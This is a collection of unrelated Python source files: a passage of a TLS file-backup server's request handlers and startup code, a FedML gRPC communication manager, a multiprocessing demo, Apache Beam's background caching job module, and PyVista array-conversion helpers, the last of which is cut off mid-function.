   print "[!][" + now() + "] The checkpoint client %s sent us isn't available. This shouldn't be possible if the client doesn't tamper with the client application" %(client_name)
   return conn, False, conn_tracker # bye client
  clientside_shared_dirname = "mysharedfiles" + os.sep + client_names_repr
  file_structure_list = []
  for shared_backup_directory in restore_list:
   backup_shared_dirname = server_global.shared_backup_files_dir + os.sep + shared_backup_directory
   file_structure = fs_server2client(backup_shared_dirname, clientside_shared_dirname, sharedfile_username=client_name)
   file_structure_list.append(file_structure)
  conn = send_in_chunks(conn, file_structure_list)
  conn = server_send_ok(conn, client_name)
  return conn, False, conn_tracker # bye client
 # ---------------------------------------------------------
 # DELETE-FILE (applicable to individual files and backups |
 # ---------------------------------------------------------
 elif data=="DELETE-FILE":
  client_name = get_clientname(client_ip, serving_port, conn_tracker)
  if not client_name:
   return conn, False, conn_tracker # bye client
  client_loggedin_status = get_client_loggedin_status(client_ip, serving_port, client_name, conn_tracker)
  if not client_loggedin_status:
   return conn, False, conn_tracker # bye client
  print "[+][" + now() + "] Client %s wants to delete a local file or dir in here (individual files)." %(client_name)
  clientside_path = conn.read()
  clientside_individual_dirname = "myprivatefiles"
  serverside_individual_dirname = server_global.individual_files_dir + os.sep + client_name
  serverside_path = clientside_path.replace(clientside_individual_dirname,serverside_individual_dirname, 1) # replace only first occurrence
  if sandbox_escaped(serverside_path, serverside_individual_dirname, conn, client_name):
   return conn, False, conn_tracker # bye client
  if os.path.isdir(serverside_path):
   empty_directory(serverside_path)
  elif os.path.isfile(serverside_path + ".encrypted"):
   # a stored file is the triple cryptogram + encrypted key + signature
   delete_file_or_dir(serverside_path + ".encrypted")
   delete_file_or_dir(serverside_path + ".key.encrypted")
   delete_file_or_dir(serverside_path + ".sig")
  conn = server_send_ok(conn, client_name)
  return conn, False, conn_tracker # bye client
def threaded_clienthandler(client_ip, serving_port, serving_socket, initial_ssl_context):
    # Per-client worker thread: upgrade the accepted TCP socket to TLS,
    # serve the client, then close the connection and free a thread slot.
    new_conn = initial_ssl_context.wrap_socket(serving_socket, server_side=True, do_handshake_on_connect=True)
    # Track the socket globally so a CTRL-C in any thread can close it.
    server_global.open_sockets.append(new_conn)
    try:
        deal_with_client(new_conn, client_ip, serving_port)
    # clean up: close connection socket if open and leave
    except KeyboardInterrupt:
        if new_conn in server_global.open_sockets: server_close_connection_socket(new_conn, serving_port)
        print "[!][" + now() + "] CTRL-C: Server shutting down..."
        # NOTE(review): exit() here skips the semaphore release below, so a
        # slot is never returned on this path — confirm this is intentional.
        exit()
    except ssl.SSLError as err:
        # TLS-level failure (e.g. undecryptable record): drop this client only.
        print "[!][" + now() + "] Client sent a message that could not be decrypted. Closing connection. Error code: %s" %(repr(err))
    # normal behavior: close connection socket
    if new_conn in server_global.open_sockets: server_close_connection_socket(new_conn, serving_port)
    # Return this thread's slot to the bounded semaphore acquired by the
    # accept loop in wait_for_clients().
    server_global.thread_semaphore.release()
def wait_for_clients(main_server_socket, initial_ssl_context):
    """Block on accept() for one client, then hand it off to a worker thread."""
    # ensuring robustness in server shutdowns
    try:
        serving_socket, serving_info = main_server_socket.accept()
        client_ip = serving_info[0]
        serving_port = serving_info[1]
        # Bounded semaphore caps the number of simultaneous client threads;
        # released by the worker thread when it finishes.
        server_global.thread_semaphore.acquire()
    # clean up: close all current connections and leave
    except KeyboardInterrupt:
        # NOTE(review): if accept() itself is interrupted, serving_port is not
        # yet bound and this loop raises NameError — confirm/fix upstream.
        for open_client_conn in server_global.open_sockets:
            server_close_connection_socket(open_client_conn, serving_port)
        print "[!][" + now() + "] CTRL-C: Server shutting down..."
        exit()
    # REMEMBERME: switch to multi threading
    #threaded_clienthandler(client_ip, serving_port, serving_socket, initial_ssl_context) # debugging without multi-threading
    # deal with new connection by creating a new thread
    handler_thread = threading.Thread(target=threaded_clienthandler, args=(client_ip, serving_port, serving_socket, initial_ssl_context))
    handler_thread.start()
def server():
    """Create the TLS listening socket on port 1337 and serve clients forever."""
    simple_banner = "###################### SIRS-SERVER ######################"
    print simple_banner
    # Empty HOST binds to all interfaces.
    HOST = ""
    PORT = 1337
    # TLS VERSION USED: TLSv1.2
    # the purpose of this ssl context is to initiate a connection with the client.
    # we will not be able to fully authenticate the client just yet
    initial_ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
    # load necessary files to create a TLS connection (server certificate and private key)
    initial_ssl_context.load_cert_chain(certfile="server/sirs-server.crt", keyfile="server/sirs-server.key")
    # we have a fake domain name in the client certificate, but we can't verify it yet because we don't know
    # the client's defined hostname yet, neither do we have the client's certificate yet. We need to uncheck
    # this option and create a One-way TLS connection for now
    initial_ssl_context.check_hostname = False
    # we do not require a certificate from the client just yet
    initial_ssl_context.verify_mode = ssl.CERT_NONE
    main_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # SO_REUSEADDR is used so the server socket can be reused if needed (for example, if we CTRL-C)
    main_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    main_server_socket.bind((HOST, PORT))
    main_server_socket.listen(5) # 5 clients allowed in queue for this socket
    # wait for clients to connect to our server
    while True:
        wait_for_clients(main_server_socket, initial_ssl_context)
def run():
    """Prepare the server's on-disk layout and state, then start serving.

    Creates the directories used for client certificates and files, makes
    sure the clients JSON "mini database" exists, loads it into memory, and
    finally enters the blocking server() accept loop.
    """
    mkdir_p(server_global.client_certificates_dir)
    mkdir_p(server_global.individual_files_dir)
    mkdir_p(server_global.shared_files_dir)
    mkdir_p(server_global.individual_backup_files_dir)
    mkdir_p(server_global.shared_backup_files_dir)
    # create clients file if it doesn't exist yet
    if not os.path.exists(server_global.client_json_filename):
        open(server_global.client_json_filename, "a").close()
    # populate 'clients' dict from the file (mini dbase); an empty or
    # corrupt JSON file yields an empty registry instead of crashing.
    # `with` guarantees the handle is closed on every path (the original
    # left it open if an exception escaped before the explicit close()).
    try:
        with open(server_global.client_json_filename, "r") as json_f:
            server_global.clients_info = json.loads(json_f.read())
    except ValueError:
        server_global.clients_info = dict()
    # DANGEROUS VARIABLES FOR MULTI-THREADING: "clients_info", "open_sockets".
    # FILE OPERATIONS ARE DANGEROUS IN MULTI-THREADING: CONTROL READ-WRITE OPERATIONS
    server()
class ServerGlobal:
    """Process-wide mutable server state shared by all client-handler threads.

    Holds the on-disk directory layout, the in-memory client registry, the
    list of open client sockets, and the semaphore bounding thread count.
    """

    def __init__(self):
        root = "clients"
        self.clients_dir = root
        self.client_certificates_dir = os.path.join(root, "client_certs")
        self.individual_files_dir = os.path.join(root, "individual_files")
        self.shared_files_dir = os.path.join(root, "shared_files")
        self.individual_backup_files_dir = os.path.join(root, "individual_backups")
        self.shared_backup_files_dir = os.path.join(root, "shared_backups")
        self.client_json_filename = os.path.join(root, "clients_info.json")
        # Sockets currently open to clients; closed on shutdown.
        self.open_sockets = []
        # In-memory client registry, mirrored to clients_info.json.
        self.clients_info = {}
        # BOUNDED-SEMAPHORE: limit simultaneous client threads (default: 4)
        self.thread_semaphore = threading.BoundedSemaphore(value=4)
# Singleton holding all process-wide server state.
server_global = ServerGlobal()
if __name__=="__main__":
    # Script entry point: set up directories/state and start the server.
    run()
grpc_comm_manager.py | import logging
from typing import List
from concurrent import futures
import threading
import grpc
from ..gRPC import grpc_comm_manager_pb2_grpc, grpc_comm_manager_pb2
lock = threading.Lock()
from FedML.fedml_core.distributed.communication.base_com_manager import BaseCommunicationManager
from FedML.fedml_core.distributed.communication.message import Message
from FedML.fedml_core.distributed.communication.observer import Observer
from FedML.fedml_core.distributed.communication.gRPC.grpc_server import GRPCCOMMServicer
class GRPCCommManager(BaseCommunicationManager):
    """gRPC-based communication manager for FedML server/client nodes.

    Starts a local gRPC server on construction and dispatches received
    messages to registered observers from a background thread.
    """

    # Known receiver endpoints; receiver `i` listens on port 50000 + i.
    # NOTE(review): hard-coded IPs — consider moving these to configuration.
    _RECEIVER_HOSTS = {
        0: '67.199.133.186',
        1: '67.199.133.186',
        2: '117.161.90.229',
    }

    def __init__(self, host, port, topic='fedml', client_id=0, client_num=0):
        self.host = host
        self.port = str(port)
        self._topic = topic
        self.client_id = client_id
        self.client_num = client_num
        self._observers: List[Observer] = []
        # client_id 0 is by convention the server node.
        self.node_type = "server" if client_id == 0 else "client"
        # Start the gRPC server that receives messages addressed to this node.
        self.grpc_server = grpc.server(futures.ThreadPoolExecutor(max_workers=client_num))
        self.grpc_servicer = GRPCCOMMServicer(host, port, client_num, client_id)
        grpc_comm_manager_pb2_grpc.add_gRPCCommManagerServicer_to_server(
            self.grpc_servicer,
            self.grpc_server
        )
        self.grpc_server.add_insecure_port("{}:{}".format(host, port))
        self.grpc_server.start()
        print("server started. Listening on port " + str(port))

    def send_message(self, msg: Message):
        """Serialize ``msg`` to JSON and deliver it to its receiver over gRPC.

        Raises:
            ValueError: if the receiver id has no known endpoint.  (The
                original code left ``channel_url`` unbound in that case and
                crashed with UnboundLocalError.)
        """
        payload = msg.to_json()
        receiver_id = msg.get_receiver_id()
        host = self._RECEIVER_HOSTS.get(receiver_id)
        if host is None:
            raise ValueError("unknown receiver_id: {}".format(receiver_id))
        channel_url = '{}:{}'.format(host, str(50000 + receiver_id))
        channel = grpc.insecure_channel(channel_url)
        stub = grpc_comm_manager_pb2_grpc.gRPCCommManagerStub(channel)
        request = grpc_comm_manager_pb2.CommRequest()
        logging.info("sending message to port " + str(50000 + int(msg.get_receiver_id())))
        request.client_id = self.client_id
        request.message = payload
        stub.sendMessage(request)
        logging.info("sent")

    def add_observer(self, observer: Observer):
        """Register an observer to be notified of incoming messages."""
        self._observers.append(observer)

    def remove_observer(self, observer: Observer):
        """Unregister a previously added observer."""
        self._observers.remove(observer)

    def handle_receive_message(self):
        """Start the background thread that dispatches incoming messages."""
        thread = threading.Thread(target=self.message_handling_subroutine)
        thread.start()

    def message_handling_subroutine(self):
        """Poll the servicer's queue forever and fan messages out to observers.

        NOTE(review): this busy-waits on qsize(); a blocking queue.get()
        would avoid spinning the CPU — left as-is to preserve behavior.
        """
        while True:
            if self.grpc_servicer.message_q.qsize() > 0:
                # Serialize observer dispatch across threads.
                lock.acquire()
                msg_params_string = self.grpc_servicer.message_q.get()
                msg_params = Message()
                msg_params.init_from_json_string(msg_params_string)
                msg_type = msg_params.get_type()
                for observer in self._observers:
                    observer.receive_message(msg_type, msg_params)
                lock.release()

    def stop_receive_message(self):
        """No-op; the receive thread runs until process exit."""
        pass

    def notify(self, message: Message):
        """Deliver ``message`` to all registered observers."""
        msg_type = message.get_type()
        for observer in self._observers:
            observer.receive_message(msg_type, message)
|
process_id.py | #!/usr/bin/python
from multiprocessing import Process
import os
# getting parent and child process Ids
def fun():
    """Print this process's id and its parent's id (intended to run in a child)."""
    separator = '--------------------------'
    print(separator)
    print('calling fun')
    print('parent process id:', os.getppid())
    print('process id:', os.getpid())
def main():
    """Spawn two child processes in sequence, each running fun()."""
    print('main fun')
    print('process id:', os.getpid())
    for _ in range(2):
        worker = Process(target=fun)
        worker.start()
        worker.join()
if __name__ == '__main__':
    # Run the demo only when executed directly, not on import
    # (required on platforms where multiprocessing spawns fresh interpreters).
    main()
|
background_caching_job.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Module to build and run background caching job.
For internal use only; no backwards-compatibility guarantees.
A background caching job is a job that captures events for all capturable
sources of a given pipeline. With Interactive Beam, one such job is started when
a pipeline run happens (which produces a main job in contrast to the background
caching job) and meets the following conditions:
#. The pipeline contains capturable sources, configured through
interactive_beam.options.capturable_sources.
#. No such background job is running.
#. No such background job has completed successfully and the cached events are
still valid (invalidated when capturable sources change in the pipeline).
Once started, the background caching job runs asynchronously until it hits some
capture limit configured in interactive_beam.options. Meanwhile, the main job
and future main jobs from the pipeline will run using the deterministic
replayable captured events until they are invalidated.
"""
# pytype: skip-file
from __future__ import absolute_import
import logging
import threading
import time
import apache_beam as beam
from apache_beam.runners.interactive import interactive_environment as ie
from apache_beam.runners.interactive.caching import streaming_cache
from apache_beam.runners.runner import PipelineState
_LOGGER = logging.getLogger(__name__)
class BackgroundCachingJob(object):
  """A simple abstraction that controls necessary components of a timed and
  space limited background caching job.

  A background caching job successfully completes source data capture in 2
  conditions:

    #. The job is finite and runs into DONE state;
    #. The job is infinite but hits an interactive_beam.options configured
       limit and gets cancelled into CANCELLED/CANCELLING state.

  In both situations, the background caching job should be treated as done
  successfully.
  """
  def __init__(self, pipeline_result, limiters):
    """Tracks the given job result and starts the limiter-watching thread.

    Args:
      pipeline_result: the PipelineResult of the background caching job.
      limiters: checks s.t. if any are triggered then the background caching
        job gets cancelled.
    """
    self._pipeline_result = pipeline_result
    # Limiters are checks s.t. if any are triggered then the background caching
    # job gets cancelled.
    self._limiters = limiters
    # Daemon thread so interpreter shutdown is never blocked on the checker.
    self._condition_checker = threading.Thread(
        target=self._background_caching_job_condition_checker, daemon=True)
    self._condition_checker.start()

  def _background_caching_job_condition_checker(self):
    # Poll every 0.5s until the job terminates on its own or a limiter fires.
    while not PipelineState.is_terminal(self._pipeline_result.state):
      if self._should_end_condition_checker():
        self.cancel()
        break
      time.sleep(0.5)

  def _should_end_condition_checker(self):
    # Generator expression instead of materializing a throwaway list.
    return any(l.is_triggered() for l in self._limiters)

  def is_done(self):
    """Returns True if the job completed or was cancelled by a limiter."""
    is_terminated = self._pipeline_result.state is PipelineState.DONE
    is_triggered = self._should_end_condition_checker()
    is_cancelling = (
        self._pipeline_result.state in (
            PipelineState.CANCELLED, PipelineState.CANCELLING))
    return is_terminated or (is_triggered and is_cancelling)

  def is_running(self):
    """Returns True while the underlying pipeline is in RUNNING state."""
    return self._pipeline_result.state is PipelineState.RUNNING

  def cancel(self):
    """Cancels this background caching job.
    """
    if not PipelineState.is_terminal(self._pipeline_result.state):
      try:
        self._pipeline_result.cancel()
      except NotImplementedError:
        # Ignore the cancel invocation if it is never implemented by the runner.
        pass
def attempt_to_run_background_caching_job(runner, user_pipeline, options=None):
  """Attempts to run a background caching job for a user-defined pipeline.

  The pipeline result is automatically tracked by Interactive Beam in case
  future cancellation/cleanup is needed.

  Args:
    runner: the runner used to execute the background caching pipeline.
    user_pipeline: the user-defined pipeline whose capturable sources should
      be captured.
    options: optional pipeline options forwarded to the background pipeline.
  """
  if is_background_caching_job_needed(user_pipeline):
    # Cancel non-terminal jobs if there is any before starting a new one.
    attempt_to_cancel_background_caching_job(user_pipeline)
    # Cancel the gRPC server serving the test stream if there is one.
    attempt_to_stop_test_stream_service(user_pipeline)
    # TODO(BEAM-8335): refactor background caching job logic from
    # pipeline_instrument module to this module and aggregate tests.
    from apache_beam.runners.interactive import pipeline_instrument as instr
    # Rebuild the user pipeline under the given runner/options.
    runner_pipeline = beam.pipeline.Pipeline.from_runner_api(
        user_pipeline.to_runner_api(use_fake_coders=True), runner, options)
    # Instrument it into the caching-only pipeline and run asynchronously.
    background_caching_job_result = beam.pipeline.Pipeline.from_runner_api(
        instr.build_pipeline_instrument(
            runner_pipeline).background_caching_pipeline_proto(),
        runner,
        options).run()
    limiters = ie.current_env().options.capture_control.limiters()
    # Track the result so future runs can cancel/clean up this job.
    ie.current_env().set_background_caching_job(
        user_pipeline,
        BackgroundCachingJob(background_caching_job_result, limiters=limiters))
def is_background_caching_job_needed(user_pipeline):
  """Determines if a background caching job needs to be started.

  It does several state checks and record state changes throughout the process.
  It is not idempotent to simplify the usage.
  """
  job = ie.current_env().get_background_caching_job(user_pipeline)
  # Checks if the pipeline contains any source that needs to be cached.
  need_cache = has_source_to_cache(user_pipeline)
  # If this is True, we can invalidate a previous done/running job if there is
  # one.  (Evaluated unconditionally: this call records state changes.)
  cache_changed = is_source_to_cache_changed(user_pipeline)
  if not need_cache:
    return False
  # When capture replay is disabled, cache is always needed for capturable
  # sources (if any).
  if not ie.current_env().options.enable_capture_replay:
    from apache_beam.runners.interactive.options import capture_control
    capture_control.evict_captured_data()
    return True
  # First job ever seen for this pipeline.
  if not job:
    return True
  # A previous job exists but is neither done nor running: start anew.
  if not (job.is_done() or job.is_running()):
    return True
  # Otherwise only a change in the source set invalidates the previous job.
  return cache_changed
def is_cache_complete(pipeline_id):
  # type: (str) -> bool

  """Returns True if the background cache for the given pipeline is done."""
  user_pipeline = ie.current_env().pipeline_id_to_pipeline(pipeline_id)
  job = ie.current_env().get_background_caching_job(user_pipeline)
  done = job and job.is_done()
  # Peek at the source signature without recording it.
  changed = is_source_to_cache_changed(
      user_pipeline, update_cached_source_signature=False)
  return done and not changed
def has_source_to_cache(user_pipeline):
  """Determines if a user-defined pipeline contains any source that need to be
  cached. If so, also immediately wrap current cache manager held by current
  interactive environment into a streaming cache if this has not been done.
  The wrapping doesn't invalidate existing cache in any way.

  This can help determining if a background caching job is needed to write
  cache for sources and if a test stream service is needed to serve the cache.
  """
  from apache_beam.runners.interactive import pipeline_instrument as instr
  # TODO(BEAM-8335): we temporarily only cache replaceable unbounded sources.
  # Add logic for other cacheable sources here when they are available.
  if not instr.has_unbounded_sources(user_pipeline):
    return False
  manager = ie.current_env().get_cache_manager(
      user_pipeline, create_if_absent=True)
  if not isinstance(manager, streaming_cache.StreamingCache):
    # Wrap the plain cache manager into a StreamingCache exactly once.
    ie.current_env().set_cache_manager(
        streaming_cache.StreamingCache(
            ie.current_env().get_cache_manager(user_pipeline)._cache_dir,
            is_cache_complete=is_cache_complete,
            sample_resolution_sec=1.0),
        user_pipeline)
  return True
def attempt_to_cancel_background_caching_job(user_pipeline):
  """Attempts to cancel background caching job for a user-defined pipeline.

  If no background caching job needs to be cancelled, NOOP. Otherwise, cancel
  such job.
  """
  background_job = ie.current_env().get_background_caching_job(user_pipeline)
  if background_job:
    background_job.cancel()
def attempt_to_stop_test_stream_service(user_pipeline):
  """Attempts to stop the gRPC server/service serving the test stream.

  If there is no such server started, NOOP. Otherwise, stop it.
  """
  if not is_a_test_stream_service_running(user_pipeline):
    return
  controller = ie.current_env().evict_test_stream_service_controller(
      user_pipeline)
  controller.stop()
def is_a_test_stream_service_running(user_pipeline):
  """Checks to see if there is a gRPC server/service running that serves the
  test stream to any job started from the given user_pipeline.
  """
  controller = ie.current_env().get_test_stream_service_controller(
      user_pipeline)
  return controller is not None
def _sizeof_fmt(num, suffix='B'):
  """Formats a byte count into a human readable string.

  Extracted from is_source_to_cache_changed, where it was re-defined (inside
  a conditional branch) on every call.
  """
  for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
    if abs(num) < 1000.0:
      return "%3.1f%s%s" % (num, unit, suffix)
    num /= 1000.0
  return "%.1f%s%s" % (num, 'Yi', suffix)


def is_source_to_cache_changed(
    user_pipeline, update_cached_source_signature=True):
  """Determines if there is any change in the sources that need to be cached
  used by the user-defined pipeline.

  Due to the expensiveness of computations and for the simplicity of usage,
  this function is not idempotent because Interactive Beam automatically
  discards previously tracked signature of transforms and tracks the current
  signature of transforms for the user-defined pipeline if there is any change.

  When it's True, there is addition/deletion/mutation of source transforms
  that requires a new background caching job.

  Args:
    user_pipeline: the user-defined pipeline to inspect.
    update_cached_source_signature: when True (default) and a change is
      detected, evict stale captured data and record the new signature.
  """
  # By default gets empty set if the user_pipeline is first time seen because
  # we can treat it as adding transforms.
  recorded_signature = ie.current_env().get_cached_source_signature(
      user_pipeline)
  current_signature = extract_source_to_cache_signature(user_pipeline)
  is_changed = not current_signature.issubset(recorded_signature)
  # The computation of extract_unbounded_source_signature is expensive, track on
  # change by default.
  if is_changed and update_cached_source_signature:
    options = ie.current_env().options
    # No info needed when capture replay is disabled.
    if options.enable_capture_replay:
      if not recorded_signature:
        _LOGGER.info(
            'Interactive Beam has detected unbounded sources in your pipeline. '
            'In order to have a deterministic replay, a segment of data will '
            'be recorded from all sources for %s seconds or until a total of '
            '%s have been written to disk.',
            options.capture_duration.total_seconds(),
            _sizeof_fmt(options.capture_size_limit))
      else:
        _LOGGER.info(
            'Interactive Beam has detected a new streaming source was '
            'added to the pipeline. In order for the cached streaming '
            'data to start at the same time, all captured data has been '
            'cleared and a new segment of data will be recorded.')
        ie.current_env().cleanup()
    ie.current_env().set_cached_source_signature(
        user_pipeline, current_signature)
  return is_changed
def extract_source_to_cache_signature(user_pipeline):
  """Extracts a set of signature for sources that need to be cached in the
  user-defined pipeline.

  A signature is a str representation of urn and payload of a source.
  """
  from apache_beam.runners.interactive import pipeline_instrument as instr
  # TODO(BEAM-8335): we temporarily only cache replaceable unbounded sources.
  # Add logic for other cacheable sources here when they are available.
  applied_transforms = instr.unbounded_sources(user_pipeline)
  source_ptransforms = {applied.transform for applied in applied_transforms}
  _, context = user_pipeline.to_runner_api(
      return_context=True, use_fake_coders=True)
  return {
      str(ptransform.to_runner_api(context))
      for ptransform in source_ptransforms
  }
|
helpers.py | """Supporting functions for polydata and grid objects."""
import collections.abc
import ctypes
import enum
import logging
import signal
import warnings
from threading import Thread
import threading
import numpy as np
import scooby
import vtk
import vtk.util.numpy_support as nps
import pyvista
from .fileio import from_meshio
class FieldAssociation(enum.Enum):
    """Represents which type of vtk field a scalar or vector array is associated with."""

    # Values mirror vtkDataObject's FIELD_ASSOCIATION_* constants so members
    # can be passed straight through to VTK APIs.
    POINT = vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS
    CELL = vtk.vtkDataObject.FIELD_ASSOCIATION_CELLS
    NONE = vtk.vtkDataObject.FIELD_ASSOCIATION_NONE
    ROW = vtk.vtkDataObject.FIELD_ASSOCIATION_ROWS
def get_vtk_type(typ):
    """Look up the VTK type for a given python data type.

    Corrects for string type mapping issues.

    Return
    ------
    int : the integer type id specified in vtkType.h

    """
    vtk_type = nps.get_vtk_array_type(typ)
    # Work around the numpy_support string-mapping bug: id 3 comes back for
    # string data; report id 13 instead.
    return 13 if vtk_type == 3 else vtk_type
def vtk_bit_array_to_char(vtkarr_bint):
    """Cast vtk bit array to a char array."""
    char_array = vtk.vtkCharArray()
    # Copy the bit array's contents into the char array.
    char_array.DeepCopy(vtkarr_bint)
    return char_array
def vtk_id_list_to_array(vtk_id_list):
    """Convert a vtkIdList to a NumPy array."""
    n_ids = vtk_id_list.GetNumberOfIds()
    return np.array([vtk_id_list.GetId(idx) for idx in range(n_ids)])
def convert_string_array(arr, name=None):
    """Convert a numpy array of strings to a vtkStringArray or vice versa.

    Note that this is terribly inefficient - inefficient support
    is better than no support :). If you have ideas on how to make this faster,
    please consider opening a pull request.

    """
    if isinstance(arr, np.ndarray):
        # numpy -> vtk: insert values one at a time (slow but simple).
        vtk_str_arr = vtk.vtkStringArray()
        for value in arr:
            vtk_str_arr.InsertNextValue(value)
        if isinstance(name, str):
            vtk_str_arr.SetName(name)
        return vtk_str_arr
    # Otherwise it is a vtk array: pull values out one at a time.
    return np.array(
        [arr.GetValue(idx) for idx in range(arr.GetNumberOfValues())],
        dtype='|U')
def convert_array(arr, name=None, deep=0, array_type=None):
    """Convert a NumPy array to a vtkDataArray or vice versa.

    Parameters
    -----------
    arr : ndarray or vtkDataArray
        A numpy array or vtkDataArray to convert.
    name : str
        The name of the data array for VTK.
    deep : bool
        If input is numpy array then deep copy values.
    array_type : int, optional
        VTK array type id to force for the output array.

    Return
    ------
    vtkDataArray or ndarray
        The converted array: a ``vtkDataArray`` when the input is a NumPy
        ``ndarray``, or a NumPy ``ndarray`` when the input is a VTK array.
        ``None`` if the input is ``None``.

    """
    if arr is None:
        return
    if isinstance(arr, np.ndarray):
        # dtype objects should be compared with ==, not identity.
        if arr.dtype == np.dtype('O'):
            arr = arr.astype('|S')
        arr = np.ascontiguousarray(arr)
        if arr.dtype.type in (np.str_, np.bytes_):
            # This handles strings
            vtk_data = convert_string_array(arr)
        else:
            # This will handle numerical data (arr already contiguous above)
            vtk_data = nps.numpy_to_vtk(num_array=arr, deep=deep, array_type=array_type)
        if isinstance(name, str):
            vtk_data.SetName(name)
        return vtk_data
    # Otherwise input must be a vtkDataArray
    if not isinstance(arr, (vtk.vtkDataArray, vtk.vtkBitArray, vtk.vtkStringArray)):
        raise TypeError('Invalid input array type ({}).'.format(type(arr)))
    # Handle booleans
    if isinstance(arr, vtk.vtkBitArray):
        arr = vtk_bit_array_to_char(arr)
    # Handle string arrays
    if isinstance(arr, vtk.vtkStringArray):
        return convert_string_array(arr)
    # Convert from vtkDataArray to NumPy
    return nps.vtk_to_numpy(arr)
def is_pyvista_dataset(obj):
    """Return True if the Object is a PyVista wrapped dataset."""
    dataset_types = (pyvista.Common, pyvista.MultiBlock)
    return isinstance(obj, dataset_types)
def point_array(mesh, name):
    """Return point array of a vtk object."""
    return convert_array(mesh.GetPointData().GetAbstractArray(name))
def point_scalar(mesh, name):
    """Return point array of a vtk object.

    DEPRECATED: please use `point_array` instead.
    """
    # Thin deprecated alias kept for backwards compatibility.
    warnings.warn("DEPRECATED: please use `point_array` instead.")
    return point_array(mesh, name)
def field_array(mesh, name):
    """Return field array of a vtk object."""
    return convert_array(mesh.GetFieldData().GetAbstractArray(name))
def field_scalar(mesh, name):
    """Return field array of a vtk object.

    DEPRECATED: please use `field_array` instead.
    """
    # Thin deprecated alias kept for backwards compatibility.
    warnings.warn("DEPRECATED: please use `field_array` instead.")
    return field_array(mesh, name)
def cell_array(mesh, name):
    """Return cell array of a vtk object."""
    return convert_array(mesh.GetCellData().GetAbstractArray(name))
def cell_scalar(mesh, name):
    """Return cell array of a vtk object.

    DEPRECATED: please use `cell_array` instead.
    """
    # Thin deprecated alias kept for backwards compatibility.
    warnings.warn("DEPRECATED: please use `cell_array` instead.")
    return cell_array(mesh, name)
def row_array(data_object, name):
    """Return row array of a vtk object."""
    return convert_array(data_object.GetRowData().GetAbstractArray(name))
def parse_field_choice(field):
    """Return the FieldAssociation matching a user-supplied field specifier."""
    if isinstance(field, FieldAssociation):
        return field
    if isinstance(field, str):
        aliases = {
            'cell': FieldAssociation.CELL,
            'c': FieldAssociation.CELL,
            'cells': FieldAssociation.CELL,
            'point': FieldAssociation.POINT,
            'p': FieldAssociation.POINT,
            'points': FieldAssociation.POINT,
            'field': FieldAssociation.NONE,
            'f': FieldAssociation.NONE,
            'fields': FieldAssociation.NONE,
            'row': FieldAssociation.ROW,
            'r': FieldAssociation.ROW,
        }
        key = field.strip().lower()
        association = aliases.get(key)
        if association is None:
            raise ValueError('Data field ({}) not supported.'.format(key))
        return association
    raise ValueError('Data field ({}) not supported.'.format(field))
def get_array(mesh, name, preference='cell', info=False, err=False):
    """Search point, cell and field data for an array.

    Parameters
    ----------
    mesh : vtk.vtkTable or dataset
        The object whose arrays are searched.

    name : str
        The name of the array to get the range.

    preference : str, optional
        When scalars is specified, this is the preferred array type to
        search for in the dataset. Must be either ``'point'``,
        ``'cell'``, or ``'field'``

    info : bool
        Return info about the array rather than the array itself.

    err : bool
        Boolean to control whether to throw an error if array is not present.

    """
    # Tables only carry row data, so short-circuit every other lookup.
    if isinstance(mesh, vtk.vtkTable):
        arr = row_array(mesh, name)
        if arr is None and err:
            raise KeyError('Data array ({}) not present in this dataset.'.format(name))
        field = FieldAssociation.ROW
        if info:
            return arr, field
        return arr
    # Look the name up in all three association types.
    parr = point_array(mesh, name)
    carr = cell_array(mesh, name)
    farr = field_array(mesh, name)
    preference = parse_field_choice(preference)
    # Name is ambiguous (present in more than one association): the caller's
    # preference decides which array wins.
    if np.sum([parr is not None, carr is not None, farr is not None]) > 1:
        if preference == FieldAssociation.CELL:
            if info:
                return carr, FieldAssociation.CELL
            else:
                return carr
        elif preference == FieldAssociation.POINT:
            if info:
                return parr, FieldAssociation.POINT
            else:
                return parr
        elif preference == FieldAssociation.NONE:
            if info:
                return farr, FieldAssociation.NONE
            else:
                return farr
        else:
            # ROW preference is not valid for non-table datasets.
            raise ValueError('Data field ({}) not supported.'.format(preference))
    # Unambiguous (or absent): return whichever association has it,
    # checking point, then cell, then field data.
    arr = None
    field = None
    if parr is not None:
        arr = parr
        field = FieldAssociation.POINT
    elif carr is not None:
        arr = carr
        field = FieldAssociation.CELL
    elif farr is not None:
        arr = farr
        field = FieldAssociation.NONE
    elif err:
        raise KeyError('Data array ({}) not present in this dataset.'.format(name))
    if info:
        return arr, field
    return arr
def vtk_points(points, deep=True):
    """Convert numpy points to a vtkPoints object."""
    # VTK requires C-contiguous memory for zero-copy wrapping.
    if not points.flags['C_CONTIGUOUS']:
        points = np.ascontiguousarray(points)
    vtk_pts = vtk.vtkPoints()
    vtk_pts.SetData(nps.numpy_to_vtk(points, deep=deep))
    return vtk_pts
def line_segments_from_points(points):
    """Generate non-connected line segments from points.

    Assumes points are ordered as line segments and an even number of points
    are given.

    Parameters
    ----------
    points : np.ndarray
        Points representing line segments. An even number must be given as
        every two vertices represent a single line segment. For example, two
        line segments would be represented as:

        np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])

    Returns
    -------
    lines : pyvista.PolyData
        PolyData with lines and cells.

    Examples
    --------
    This example plots two line segments at right angles to each other.

    >>> import pyvista
    >>> import numpy as np
    >>> points = np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
    >>> lines = pyvista.line_segments_from_points(points)
    >>> lines.plot() # doctest:+SKIP

    """
    if len(points) % 2 != 0:
        raise ValueError("An even number of points must be given to define each segment.")
    # Assuming ordered points, create array defining line order
    n_points = len(points)
    n_lines = n_points // 2
